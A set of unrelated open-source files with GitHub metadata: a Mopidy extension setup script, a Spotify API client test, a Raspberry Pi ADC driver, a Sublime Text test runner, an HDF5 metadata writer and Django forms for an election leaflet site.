"name": "Dockerfile",
"bytes": "67820"
},
{
"name": "Groovy",
"bytes": "62557"
},
{
"name": "HTML",
"bytes": "19753082"
},
{
"name": "Java",
"bytes": "166294"
},
{
"name": "JavaScript",
"bytes": "71846"
},
{
"name": "Julia",
"bytes": "408765"
},
{
"name": "Jupyter Notebook",
"bytes": "2713169"
},
{
"name": "Lua",
"bytes": "4430"
},
{
"name": "MATLAB",
"bytes": "34903"
},
{
"name": "Makefile",
"bytes": "115694"
},
{
"name": "Perl",
"bytes": "1535873"
},
{
"name": "Perl 6",
"bytes": "7280"
},
{
"name": "PowerShell",
"bytes": "6150"
},
{
"name": "Python",
"bytes": "24905683"
},
{
"name": "R",
"bytes": "351865"
},
{
"name": "Roff",
"bytes": "293052"
},
{
"name": "Scala",
"bytes": "1189019"
},
{
"name": "Shell",
"bytes": "794096"
},
{
"name": "Smalltalk",
"bytes": "3497"
},
{
"name": "TypeScript",
"bytes": "361164"
}
],
"symlink_target": ""
}
|
from .rarity import RarityStrategy
|
{
"content_hash": "189aee03465ccd64822e450dcb1b93bb",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 34,
"avg_line_length": 35,
"alnum_prop": 0.8571428571428571,
"repo_name": "vtemian/university_projects",
"id": "6b561204ab5a2d3b7a745c234f7a6e761f145631",
"size": "35",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "data_structures/bitorrent/client/strategies/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "15965"
},
{
"name": "C++",
"bytes": "9417"
},
{
"name": "Python",
"bytes": "69909"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import re
from setuptools import find_packages, setup
def get_version(filename):
with open(filename) as fh:
metadata = dict(re.findall("__([a-z]+)__ = '([^']+)'", fh.read()))
return metadata['version']
setup(
name='Mopidy-Raspberry-Jam',
version=get_version('mopidy_raspberryjam/__init__.py'),
url='https://github.com/VeryBigCorp/mopidy-raspberryjam',
license='Apache License, Version 2.0',
author='Ryan Babaie and Evan Thomas',
author_email='yeeeeah',
description='Web Client for Social Music Playing via the Raspberry Pi or other Embedded Devices',
long_description=open('README.rst').read(),
packages=find_packages(exclude=['tests', 'tests.*']),
zip_safe=False,
include_package_data=True,
install_requires=[
'setuptools',
'Mopidy >= 1.0',
'Pykka >= 1.1',
],
entry_points={
'mopidy.ext': [
'raspberryjam = mopidy_raspberryjam:Extension',
],
},
classifiers=[
'Environment :: No Input/Output (Daemon)',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Topic :: Multimedia :: Sound/Audio :: Players',
],
)
|
{
"content_hash": "1ee37752cf41a8cb0e38bb598b028f21",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 101,
"avg_line_length": 31,
"alnum_prop": 0.6129032258064516,
"repo_name": "VeryBigCorp/mopidy-raspberryjam",
"id": "329e27f39e9df48831b1dc34e38cbc1f43f188ce",
"size": "1364",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "8228"
},
{
"name": "HTML",
"bytes": "14954"
},
{
"name": "JavaScript",
"bytes": "36176"
},
{
"name": "Python",
"bytes": "2972"
}
],
"symlink_target": ""
}
|
import os
import pytest
from spotify.auth import OAuth
from spotify.client import Client
CLIENT_ID = os.environ['SPOTAPI_CLIENT_ID']
CLIENT_SECRET = os.environ['SPOTAPI_CLIENT_SECRET']
REFRESH_TOKEN = os.environ['SPOTAPI_REFRESH_TOKEN']
FRANK_ZAPPA = '6ra4GIOgCZQZMOaUECftGN'
@pytest.fixture
def spotify_auth():
auth = OAuth(CLIENT_ID, CLIENT_SECRET)
return auth
@pytest.fixture
def ccspotify(spotify_auth):
"""
Spotify client authorized with client credentials.
"""
client = Client(spotify_auth)
client.auth.request_client_credentials()
print(client.auth.token)
return client
def test_get_artist(ccspotify):
frank = ccspotify.api.artist(FRANK_ZAPPA)
assert frank['name'] == 'Frank Zappa'
assert frank['type'] == 'artist'
|
{
"content_hash": "b8f635f3adc06843c68268ea8a7c255e",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 54,
"avg_line_length": 22.91176470588235,
"alnum_prop": 0.7163029525032092,
"repo_name": "steinitzu/spotify-api",
"id": "1ca7ac626e0e49ef3ebe3ba7966ba8033c7ad33c",
"size": "779",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20464"
}
],
"symlink_target": ""
}
|
__all__ = ['DeltaSigma']
class DeltaSigma:
''' Returns an instance of the DeltaSigma class. '''
_address = 0x68 # default address for adc1 on the delta-sigma pi
_address2 = 0x69 # default address for adc2 on the delta-sigma pi
_config1 = 0x1C # 28 or 11100
_currentchannel1 = 1 # channel variable for adc1
_config2 = 0x1C # 28 or 11100
_currentchannel2 = 1 # channel variable for adc2
_bitrate = 18 # current bitrate
_signbit = False # signed bit checker
_pga = float(0.5) # current pga setting
_lsb = float(7.8125e-6) # default lsb value for 18 bit
# create a byte array and fill it with initial values to define the size
_adcreading = bytearray()
_adcreading.append(0x00)
_adcreading.append(0x00)
_adcreading.append(0x00)
_adcreading.append(0x00)
global _bus
# local methods
def _updatebyte(self, byte, bit, value):
''' Internal method for setting the value of a single bit within a byte '''
# the default byte value is 0x1C (28)
if value == 0:
# 1 << bit returns 1 shifter over by bit: ex. 1 << 2 returns 100 (4)
# ~ returns the complement: so 100 becomes -101 (-5) ( -x - 1 )
# byte & x returns the bitwise and: so 0x1c & -101 returns 11000 (24)
return byte & ~(1 << bit)
elif value == 1:
return byte | (1 << bit)
def _checkbit(self, byte, bit):
''' Internal method for reading the value of a single bit within a byte '''
if byte & (1 << bit):
return 1
else:
return 0
def _twos_comp(self, val, bits):
''' '''
if ((val & (1 << (bits - 1))) != 0):
val = val - (1 << bits)
return val
def _setchannel(self, channel):
''' Internal method for updating the config to the selected channel '''
if channel < 5:
if channel != self._currentchannel1:
if channel == 1:
self._config1 = self._updatebyte(self._config1, 5, 0)
self._config1 = self._updatebyte(self._config1, 6, 0)
self._currentchannel1 = 1
if channel == 2:
self._config1 = self._updatebyte(self._config1, 5, 1)
self._config1 = self._updatebyte(self._config1, 6, 0)
self._currentchannel1 = 2
if channel == 3:
self._config1 = self._updatebyte(self._config1, 5, 0)
self._config1 = self._updatebyte(self._config1, 6, 1)
self._currentchannel1 = 3
if channel == 4:
self._config1 = self._updatebyte(self._config1, 5, 1)
self._config1 = self._updatebyte(self._config1, 6, 1)
self._currentchannel1 = 4
else:
if channel != self._currentchannel2:
if channel == 5:
self._config2 = self._updatebyte(self._config2, 5, 0)
self._config2 = self._updatebyte(self._config2, 6, 0)
self._currentchannel2 = 5
if channel == 6:
self._config2 = self._updatebyte(self._config2, 5, 1)
self._config2 = self._updatebyte(self._config2, 6, 0)
self._currentchannel2 = 6
if channel == 7:
self._config2 = self._updatebyte(self._config2, 5, 0)
self._config2 = self._updatebyte(self._config2, 6, 1)
self._currentchannel2 = 7
if channel == 8:
self._config2 = self._updatebyte(self._config2, 5, 1)
self._config2 = self._updatebyte(self._config2, 6, 1)
self._currentchannel2 = 8
return
def __init__(self, bus, address = 0x68, address2 = 0x69, rate = 18):
''' Initialize DeltaSigma object with i2caddress '''
self._bus = bus
self._address = address
self._address2 = address2
self.setBitRate(rate)
def read_voltage(self, channel):
''' Returns the voltage from the selected adc channel (1 to 8)'''
raw = self.read_raw(channel)
if self._signbit:
voltage = (raw * (self._lsb / self._pga)) - 2.048
else:
voltage = float(raw * (self._lsb / self._pga))
return float(voltage)
def read_differential(self, channel1, channel2):
''' Returns a differential voltage reading between two channels '''
voltage1 = self.read_voltage(channel1)
voltage2 = self.read_voltage(channel2)
return float(voltage2 - voltage1)
def read_channel(self, channel):
''' Returns voltage reading for a designated channel on the Delta Sigma ADC '''
if channel > 8:
raise TypeError("That channel is not valid")
else:
return float(self.read_differential(channel, channel + 8))
def read_raw(self, channel):
''' Reads the raw value from the selected ADC channel '''
h = 0
l = 0
m = 0
s = 0
self._setchannel(channel)
if channel < 5:
config = self._config1
address = self._address
else:
config = self._config2
address = self._address2
while True:
_adcreading = self._bus.read_i2c_block_data(address, config)
if self._bitrate == 18:
h = _adcreading[0]
m = _adcreading[1]
l = _adcreading[2]
s = _adcreading[3]
else:
h = _adcreading[0]
m = _adcreading[1]
s = _adcreading[2]
if self._checkbit(s, 7) == 0:
break
self._signbit = False
t = 0.0
if self._bitrate == 18:
t = ((h & 0b00000011) << 16) | (m << 8) | l
self._signbit = bool(self._checkbit(t, 17))
if self._signbit:
t = self._updatebyte(t, 17, 0)
if self._bitrate == 16:
t = (h << 8) | m
self._signbit = bool(self._checkbit(t, 15))
if self._signbit:
t = self._updatebyte(t, 15, 0)
if self._bitrate == 14:
t = ((h & 0b00111111) << 8) | m
self._signbit = bool(self._checkbit(t, 13))
if self._signbit:
t = self._updatebyte(t, 13, 0)
if self._bitrate == 12:
t = ((h & 0b00001111) << 8) | m
self._signbit = bool(self._checkbit(t, 11))
if self._signbit:
t = self._updatebyte(t, 11, 0)
return t
def set_pga(self, gain):
'''
PGA Gain Selection:
1 = 1x
2 = 2x
4 = 4x
8 = 8x
'''
if gain == 1:
self._config1 = self._updatebyte(self._config1, 0, 0)
self._config1 = self._updatebyte(self._config1, 1, 0)
self._config2 = self._updatebyte(self._config2, 0, 0)
self._config2 = self._updatebyte(self._config2, 1, 0)
self._pga = 0.5
if gain == 2:
self._config1 = self._updatebyte(self._config1, 0, 1)
self._config1 = self._updatebyte(self._config1, 1, 0)
self._config2 = self._updatebyte(self._config2, 0, 1)
self._config2 = self._updatebyte(self._config2, 1, 0)
self._pga = 1
if gain == 4:
self._config1 = self._updatebyte(self._config1, 0, 0)
self._config1 = self._updatebyte(self._config1, 1, 1)
self._config2 = self._updatebyte(self._config2, 0, 0)
self._config2 = self._updatebyte(self._config2, 1, 1)
self._pga = 2
if gain == 8:
self._config1 = self._updatebyte(self._config1, 0, 1)
self._config1 = self._updatebyte(self._config1, 1, 1)
self._config2 = self._updatebyte(self._config2, 0, 1)
self._config2 = self._updatebyte(self._config2, 1, 1)
self._pga = 4
self._bus.write_byte(self._address, self._config1)
self._bus.write_byte(self._address2, self._config2)
return
def setBitRate(self, rate):
'''
Sample rate and resolution
12 = 12 bit (240 SPS Max)
14 = 14 bit (60 SPS Max)
16 = 16 bit (15 SPS Max)
18 = 18 bit (3.75 SPS Max)
'''
if rate == 12:
self._config1 = self._updatebyte(self._config1, 2, 0)
self._config1 = self._updatebyte(self._config1, 3, 0)
self._config2 = self._updatebyte(self._config2, 2, 0)
self._config2 = self._updatebyte(self._config2, 3, 0)
self._bitrate = 12
self._lsb = 0.0005
if rate == 14:
self._config1 = self._updatebyte(self._config1, 2, 1)
self._config1 = self._updatebyte(self._config1, 3, 0)
self._config2 = self._updatebyte(self._config2, 2, 1)
self._config2 = self._updatebyte(self._config2, 3, 0)
self._bitrate = 14
self._lsb = 0.000125
if rate == 16:
self._config1 = self._updatebyte(self._config1, 2, 0)
self._config1 = self._updatebyte(self._config1, 3, 1)
self._config2 = self._updatebyte(self._config2, 2, 0)
self._config2 = self._updatebyte(self._config2, 3, 1)
self._bitrate = 16
self._lsb = 0.00003125
if rate == 18:
self._config1 = self._updatebyte(self._config1, 2, 1)
self._config1 = self._updatebyte(self._config1, 3, 1)
self._config2 = self._updatebyte(self._config2, 2, 1)
self._config2 = self._updatebyte(self._config2, 3, 1)
self._bitrate = 18
self._lsb = 0.0000078125
self._bus.write_byte(self._address, self._config1)
self._bus.write_byte(self._address2, self._config2)
return
|
{
"content_hash": "4e962d49b036e8461401d8a6f76f7fb0",
"timestamp": "",
"source": "github",
"line_count": 259,
"max_line_length": 81,
"avg_line_length": 31.772200772200772,
"alnum_prop": 0.6306963179001094,
"repo_name": "dhhagan/ADCPi",
"id": "e03e7da184f4819112a4136173a04face56e1bcc",
"size": "8229",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ADCPi/adcpi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9754"
}
],
"symlink_target": ""
}
|
from unittest import runner
import sys, time, os, sublime
class DeferringTextTestRunner(runner.TextTestRunner):
r'''deferred test runner.
This test runner runs tests in deferred slices. It gives
back control to sublime text, such that it can draw views,
do syntax highlighting and whatever.
'''
def run(self, test):
"Run the given test case or test suite."
result = self._makeResult()
runner.registerResult(result)
result.failfast = self.failfast
result.buffer = self.buffer
startTime = time.time()
startTestRun = getattr(result, 'startTestRun', None)
if startTestRun is not None:
startTestRun()
deferred = test(result)
def _stop_testing():
stopTime = time.time()
timeTaken = stopTime - startTime
result.printErrors()
if hasattr(result, 'separator2'):
self.stream.writeln(result.separator2)
run = result.testsRun
self.stream.writeln("Ran %d test%s in %.3fs" %
(run, run != 1 and "s" or "", timeTaken))
self.stream.writeln()
expectedFails = unexpectedSuccesses = skipped = 0
try:
results = map(len, (result.expectedFailures,
result.unexpectedSuccesses,
result.skipped))
except AttributeError:
pass
else:
expectedFails, unexpectedSuccesses, skipped = results
infos = []
if not result.wasSuccessful():
self.stream.write("FAILED")
failed, errored = map(len, (result.failures, result.errors))
if failed:
infos.append("failures=%d" % failed)
if errored:
infos.append("errors=%d" % errored)
else:
self.stream.write("OK")
if skipped:
infos.append("skipped=%d" % skipped)
if expectedFails:
infos.append("expected failures=%d" % expectedFails)
if unexpectedSuccesses:
infos.append("unexpected successes=%d" % unexpectedSuccesses)
if infos:
self.stream.writeln(" (%s)" % (", ".join(infos),))
else:
self.stream.write("\n")
return result
def _wait_condition():
result = self.condition()
if not result:
assert (time.time() - self.condition_start_time) < 10, "Timeout, waited longer than 10s till condition true"
sublime.set_timeout(_wait_condition, 10)
else:
sublime.set_timeout(_continue_testing, 10)
def _continue_testing():
try:
delay = next(deferred)
if callable(delay):
self.condition = delay
self.condition_start_time = time.time()
sublime.set_timeout(_wait_condition, 10)
else:
if not isinstance(delay, int):
delay = 10
sublime.set_timeout(_continue_testing, delay)
except StopIteration:
stopTestRun = getattr(result, 'stopTestRun', None)
if stopTestRun is not None:
stopTestRun()
_stop_testing()
sublime.set_timeout(_continue_testing, 10)
|
{
"content_hash": "3612adc5322c4da43b9a0ba935f30d57",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 124,
"avg_line_length": 34.794117647058826,
"alnum_prop": 0.5190194420963652,
"repo_name": "randy3k/SublimePluginUnitTestHarness",
"id": "65d4e2624647d3b52be291700f1007cbd8298bc1",
"size": "3549",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sublime_unittest/runner.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "24891"
}
],
"symlink_target": ""
}
|
"""Implementation of odin_data Meta Writer
This module is passed meta data messages for a single acquisition which it writes to disk.
Will need to be subclassed by detector specific implementation.
Matt Taylor, Diamond Light Source
"""
import os
from time import time
import logging
import h5py
from odin_data import _version as versioneer
from odin_data.util import construct_version_dict
from .hdf5dataset import HDF5Dataset, Int64HDF5Dataset
# Data message parameters
FRAME = "frame"
OFFSET = "offset"
RANK = "rank"
CREATE_DURATION = "create_duration"
WRITE_DURATION = "write_duration"
FLUSH_DURATION = "flush_duration"
CLOSE_DURATION = "close_duration"
MESSAGE_TYPE_ID = "parameter"
# Configuration items
DIRECTORY = "directory"
FILE_PREFIX = "file_prefix"
FLUSH_FRAME_FREQUENCY = "flush_frame_frequency"
FLUSH_TIMEOUT = "flush_timeout"
def require_open_hdf5_file(func):
"""A decorator to verify the HDF5 file is open before calling the wrapped method
If the HDF5 file is currently open for writing, call the method, else log the reason
the file is not open
NOTE: This should only be used on MetaWriter methods (that take self as the first
argument)
"""
def wrapper(*args, **kwargs):
writer = args[0] # Extract class instance (self) from args
if writer.file_open:
# It is safe to call the wrapped method
return func(*args, **kwargs)
# It is not safe to call the wrapped method - log the reason why
if writer.finished:
reason = "Already finished writing"
else:
reason = "Have not received startacquisition yet"
writer._logger.error(
"%s | Cannot call %s - File not open - %s",
writer._name,
func.__name__,
reason,
)
return wrapper
class MetaWriter(object):
"""This class handles meta data messages and writes parameters to disk"""
FILE_SUFFIX = "_meta.h5"
CONFIGURE_PARAMETERS = [
DIRECTORY,
FILE_PREFIX,
FLUSH_FRAME_FREQUENCY,
FLUSH_TIMEOUT,
]
# Detector-specific parameters received on per-frame meta message
DETECTOR_WRITE_FRAME_PARAMETERS = []
def __init__(self, name, directory, process_count):
"""
Args:
name(str): Unique name to construct file path and to include in
log messages
directory(str): Directory to create the meta file in
process_count(int): Total number of processes we will receive data from
"""
self._logger = logging.getLogger(self.__class__.__name__)
# Config
self.directory = directory
self.file_prefix = None
self.flush_frame_frequency = 100
self.flush_timeout = 1
# Status
self.full_file_path = None
self.write_count = 0
self.finished = False
self.write_timeout_count = 0
# Internal parameters
self._name = name
self._processes_running = [False] * process_count
self._last_flushed = time() # Seconds since epoch
self._frames_since_flush = 0
self._hdf5_file = None
self._datasets = dict(
(dataset.name, dataset)
for dataset in self._define_datasets() + self._define_detector_datasets()
)
# Child class parameters
self._frame_data_map = dict() # Map of frame number to detector data
self._writers_finished = False
self._detector_finished = True # See stop_when_detector_finished
@staticmethod
def _define_datasets():
return [
Int64HDF5Dataset(FRAME),
Int64HDF5Dataset(OFFSET),
Int64HDF5Dataset(CREATE_DURATION, cache=False),
Int64HDF5Dataset(WRITE_DURATION),
Int64HDF5Dataset(FLUSH_DURATION),
Int64HDF5Dataset(CLOSE_DURATION, cache=False),
]
@staticmethod
def _define_detector_datasets():
return []
@property
def file_open(self):
return self._hdf5_file is not None
@property
def active_process_count(self):
return self._processes_running.count(True)
def _generate_full_file_path(self):
prefix = self.file_prefix if self.file_prefix is not None else self._name
self.full_file_path = os.path.join(
self.directory, "{}{}".format(prefix, self.FILE_SUFFIX)
)
return self.full_file_path
def _create_file(self, file_path, dataset_size):
self._logger.debug(
"%s | Opening file %s - Expecting %d frames",
self._name,
file_path,
dataset_size,
)
try:
self._hdf5_file = h5py.File(file_path, "w", libver="latest")
except IOError as error:
self._logger.error(
"%s | Failed to create file:\n%s: %s",
self._name,
error.__class__.__name__,
error.message,
)
return
self._create_datasets(dataset_size)
# Datasets created after this point will not be SWMR-readable
self._hdf5_file.swmr_mode = True
@require_open_hdf5_file
def _close_file(self):
self._logger.info("%s | Closing file", self._name)
self._flush_datasets()
self._hdf5_file.close()
self._hdf5_file = None
@require_open_hdf5_file
def _create_datasets(self, dataset_size):
"""Add predefined datasets to HDF5 file and store handles
Args:
datasets(list(HDF5Dataset)): The datasets to add to the file
"""
self._logger.debug("%s | Creating datasets", self._name)
for dataset in self._datasets.values():
dataset_handle = self._hdf5_file.create_dataset(
name=dataset.name,
shape=dataset.shape,
maxshape=dataset.maxshape,
dtype=dataset.dtype,
fillvalue=dataset.fillvalue,
)
dataset.initialise(dataset_handle, dataset_size)
@require_open_hdf5_file
def _add_dataset(self, dataset_name, data, dataset_size=None):
"""Add a new dataset with the given data
Args:
dataset_name(str): Name of dataset
data(np.ndarray): Data to initialise HDF5 dataset with
dataset_size(int): Dataset size - required if more data will be added
"""
self._logger.debug("%s | Adding dataset %s", self._name, dataset_name)
if dataset_name in self._datasets:
self._logger.debug(
"%s | Dataset %s already created", self._name, dataset_name
)
return
self._logger.debug(
"%s | Creating dataset %s with data:\n%s", self._name, dataset_name, data
)
dataset = HDF5Dataset(dataset_name, dtype=None, fillvalue=None, cache=False)
dataset_handle = self._hdf5_file.create_dataset(name=dataset_name, data=data)
dataset.initialise(dataset_handle, dataset_size)
self._datasets[dataset_name] = dataset
@require_open_hdf5_file
def _add_value(self, dataset_name, value, offset=0):
"""Append a value to the named dataset
Args:
dataset_name(str): Name of dataset
value(): The value to append
index(int): The offset to add the value to
"""
self._logger.debug("%s | Adding value to %s", self._name, dataset_name)
if dataset_name not in self._datasets:
self._logger.error("%s | No such dataset %s", self._name, dataset_name)
return
self._datasets[dataset_name].add_value(value, offset)
@require_open_hdf5_file
def _add_values(self, expected_parameters, data, offset):
"""Take values of parameters from data and write to datasets at offset
Args:
expected_parameters(list(str)): Parameters to write
data(dict): Set of parameter values
offset(int): Offset to write parameters to in datasets
"""
self._logger.debug("%s | Adding values to datasets", self._name)
for parameter in expected_parameters:
if parameter not in data:
self._logger.error(
"%s | Expected parameter %s not found in %s",
self._name,
parameter,
data,
)
continue
self._add_value(parameter, data[parameter], offset)
@require_open_hdf5_file
def _write_dataset(self, dataset_name, data):
"""Write an entire dataset with the given data
Args:
dataset_name(str): Name of dataset
data(np.ndarray): Data to set HDF5 dataset with
"""
self._logger.debug("%s | Writing entire dataset %s", self._name, dataset_name)
if dataset_name not in self._datasets:
self._logger.error("%s | No such dataset %s", self._name, dataset_name)
return
self._datasets[dataset_name].write(data)
@require_open_hdf5_file
def _write_datasets(self, expected_parameters, data):
"""Take values of parameters from data and write datasets
Args:
expected_parameters(list(str)): Parameters to write
data(dict): Set of parameter values
"""
self._logger.debug("%s | Writing datasets", self._name)
for parameter in expected_parameters:
if parameter not in data:
self._logger.error(
"%s | Expected parameter %s not found in %s",
self._name,
parameter,
data,
)
continue
self._write_dataset(parameter, data[parameter])
@require_open_hdf5_file
def _flush_datasets(self):
self._logger.debug("%s | Flushing datasets", self._name)
for dataset in self._datasets.values():
dataset.flush()
def stop_when_detector_finished(self):
"""Register that it is OK to stop when all detector-specific logic is complete
By default_detector_finished is set to True initially so that this check always
passes. Child classes that need to do their own checks can set this to False in
__ init__ and call stop_when_writers_finished when ready to stop.
"""
self._writers_finished = True
if self._detector_finished:
self._logger.debug("%s | Detector already finished", self._name)
self.stop()
else:
self._logger.debug("%s | Detector not finished", self._name)
def stop_when_writers_finished(self):
"""Register that it is OK to stop when all monitored writers have finished
Child classes can call this when all detector specific logic is complete.
"""
self._detector_finished = True
if self._writers_finished:
self._logger.debug("%s | Writers already finished", self._name)
self.stop()
else:
self._logger.debug("%s | Writers not finished", self._name)
def stop(self):
self._close_file()
self.finished = True
self._logger.info("%s | Finished", self._name)
def status(self):
"""Return current status parameters"""
return dict(
full_file_path=self.full_file_path,
num_processors=self.active_process_count,
written=self.write_count,
writing=self.file_open and not self.finished,
)
def configure(self, configuration):
"""Configure the writer with a set of one or more parameters
Args:
configuration(dict): Configuration parameters
Returns:
error(None/str): None if successful else an error message
"""
error = None
for parameter, value in configuration.items():
if parameter in self.CONFIGURE_PARAMETERS:
self._logger.debug(
"%s | Setting %s to %s", self._name, parameter, value
)
setattr(self, parameter, value)
else:
error = "Invalid parameter {}".format(parameter)
self._logger.error("%s | %s", self._name, error)
return error
def request_configuration(self):
"""Return the current configuration
Returns:
configuration(dict): Dictionary of current configuration parameters
"""
configuration = dict(
(parameter, getattr(self, parameter))
for parameter in self.CONFIGURE_PARAMETERS
)
return configuration
# Methods for handling various message types
@property
def message_handlers(self):
"""Dictionary of message type to handler method
This should be overridden by child classes to add additional handlers
Returns:
dict: message type handler methods
"""
message_handlers = {
"startacquisition": self.handle_start_acquisition,
"createfile": self.handle_create_file,
"writeframe": self.handle_write_frame,
"closefile": self.handle_close_file,
"stopacquisition": self.handle_stop_acquisition,
}
message_handlers.update(self.detector_message_handlers)
return message_handlers
@property
def detector_message_handlers(self):
return {}
def process_message(self, header, data):
"""Process a message from a data socket
This is main entry point for handling any type of message and calling
the appropriate method.
Look up the appropriate message handler based on the message type and
call it.
Leading underscores on a handler function definition parameter mean it
does not use the argument.
This should be overridden by child classes to handle any additional messages.
Args:
header(str): The header message part
data(str): The data message part (a json string or a data blob)
"""
handler = self.message_handlers.get(header[MESSAGE_TYPE_ID], None)
if handler is not None:
handler(header["header"], data)
else:
self._logger.error(
"%s | Unknown message type: %s", self._name, header[MESSAGE_TYPE_ID]
)
def handle_start_acquisition(self, header, _data):
"""Prepare the data file with the number of frames to write"""
self._logger.debug("%s | Handling start acquisition message", self._name)
if self._processes_running[header[RANK]]:
self._logger.error(
"%s | Received additional startacquisition from process rank %d - ignoring",
self._name,
header[RANK],
)
return
self._processes_running[header[RANK]] = True
self._logger.debug(
"%s | Received startacquisition message from rank %d - %d processes running",
self._name,
header[RANK],
self.active_process_count,
)
if not self.file_open:
self._create_file(self._generate_full_file_path(), header["totalFrames"])
def handle_create_file(self, _header, data):
self._logger.debug("%s | Handling create file message", self._name)
self._add_value(CREATE_DURATION, data[CREATE_DURATION])
def handle_write_frame(self, _header, data):
self._logger.debug("%s | Handling write frame message", self._name)
# TODO: Handle getting more frames than expected because of rewinding?
write_frame_parameters = [FRAME, OFFSET, WRITE_DURATION, FLUSH_DURATION]
self._add_values(write_frame_parameters, data, data[OFFSET])
# Here we keep track of whether we need to write to disk based on:
# - Time since last write
# - Number of write frame messages since last write
# Reset timeout count to 0
self.write_timeout_count = 0
self.write_count += 1
self._frames_since_flush += 1
# Write detector meta data for this frame, now that we know the offset
self.write_detector_frame_data(data[FRAME], data[OFFSET])
flush_required = (
time() - self._last_flushed >= self.flush_timeout
or self._frames_since_flush >= self.flush_frame_frequency
)
if flush_required:
self._flush_datasets()
self._last_flushed = time()
self._frames_since_flush = 0
def write_detector_frame_data(self, frame, offset):
"""Write the frame data to at the given offset
Args:
frame(int): Frame to write
offset(int): Offset in datasets to write the frame data to
"""
if not self.DETECTOR_WRITE_FRAME_PARAMETERS:
# No detector specific data to write
return
self._logger.debug("%s | Writing detector data for frame %d", self._name, frame)
if frame not in self._frame_data_map:
self._logger.error(
"%s | No detector meta data stored for frame %d", self._name, frame
)
return
data = self._frame_data_map[frame]
self._add_values(self.DETECTOR_WRITE_FRAME_PARAMETERS, data, offset)
def handle_close_file(self, _header, data):
self._logger.debug("%s | Handling close file message", self._name)
self._add_value(CLOSE_DURATION, data[CLOSE_DURATION])
def handle_stop_acquisition(self, header, _data):
"""Register that a process has finished and stop if it is the last one"""
if not self._processes_running[header[RANK]]:
self._logger.error(
"%s | Received stopacquisition from process rank %d before start - ignoring",
self._name,
header[RANK],
)
return
self._logger.debug(
"%s | Received stopacquisition from rank %d", self._name, header[RANK]
)
self._processes_running[header[RANK]] = False
if not any(self._processes_running):
self._logger.info("%s | Last processor stopped", self._name)
self.stop_when_detector_finished()
@staticmethod
def get_version():
return "odin-data", construct_version_dict(versioneer.get_versions()["version"])
|
{
"content_hash": "eaa0eeed92100b022c03ee4ceacb1d01",
"timestamp": "",
"source": "github",
"line_count": 556,
"max_line_length": 93,
"avg_line_length": 33.32374100719424,
"alnum_prop": 0.594559585492228,
"repo_name": "percival-detector/odin-data",
"id": "2374f07f4d690373a49ecb82c2f0cc18aaeac184",
"size": "18528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tools/python/odin_data/meta_writer/meta_writer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "26513"
},
{
"name": "C++",
"bytes": "1370975"
},
{
"name": "CMake",
"bytes": "41498"
},
{
"name": "CSS",
"bytes": "1144"
},
{
"name": "HTML",
"bytes": "7416"
},
{
"name": "Java",
"bytes": "29333"
},
{
"name": "JavaScript",
"bytes": "9693"
},
{
"name": "Python",
"bytes": "331800"
},
{
"name": "Shell",
"bytes": "6270"
}
],
"symlink_target": ""
}
|
from django import forms
from localflavor.gb.forms import GBPostcodeField
from core.helpers import geocode
from .models import Leaflet, LeafletImage
import constants
class ImageForm(forms.Form):
image = forms.ImageField(widget=forms.FileInput(
attrs={'accept': "image/*;capture=camera"}), error_messages={'required': 'Please add a photo or skip this step'})
class FrontPageImageForm(ImageForm):
pass
class BackPageImageForm(ImageForm):
pass
class InsidePageImageForm(ImageForm):
pass
class PostcodeForm(forms.Form):
postcode = GBPostcodeField(error_messages={'required': 'Please enter a valid UK postcode'})
wgs84_lon = forms.CharField(
required=False, max_length=100, widget=forms.HiddenInput())
wgs84_lat = forms.CharField(
required=False, max_length=100, widget=forms.HiddenInput())
constituency = forms.CharField(
required=False, max_length=255, widget=forms.HiddenInput())
def clean(self):
data = super(PostcodeForm, self).clean()
if not data.get('postcode'):
raise forms.ValidationError("Please enter a full valid UK postcode")
postcode = self.cleaned_data['postcode']
self.geo_data = geocode(postcode)
if not self.geo_data or 'constituency' not in self.geo_data:
raise forms.ValidationError("Please enter a full valid UK postcode")
data['constituency'] = self.geo_data['constituency']
data['wgs84_lon'] = self.geo_data['wgs84_lon']
data['wgs84_lat'] = self.geo_data['wgs84_lat']
return data
class LeafletDetailsFrom(forms.ModelForm):
class Meta:
model = Leaflet
class LeafletReviewFrom(forms.ModelForm):
class Meta:
model = Leaflet
fields = ('reviewed', )
class PeopleModelChoiceField(forms.ModelChoiceField):
def label_from_instance(self, obj):
if obj.current_party:
party_name = obj.current_party.party.party_name
else:
party_name = "Independent"
return u"{0} ({1})".format(
obj.name,
party_name,
)
class PeopleForm(forms.Form):
def __init__(self, *args, **kwargs):
super(PeopleForm, self).__init__(*args, **kwargs)
if 'people' in kwargs['initial']:
self.fields['people'] = \
PeopleModelChoiceField(
queryset=kwargs['initial']['_people'],
widget=forms.RadioSelect,
empty_label="Not listed",
required=False)
|
{
"content_hash": "45c5a5fa4ffcfdf8a685468b4a5b3743",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 121,
"avg_line_length": 30.321428571428573,
"alnum_prop": 0.6368276403612093,
"repo_name": "JustinWingChungHui/electionleaflets",
"id": "97007e015e0284ab89f84aec8d0834205f5c7f7f",
"size": "2547",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "electionleaflets/apps/leaflets/forms.py",
"mode": "33188",
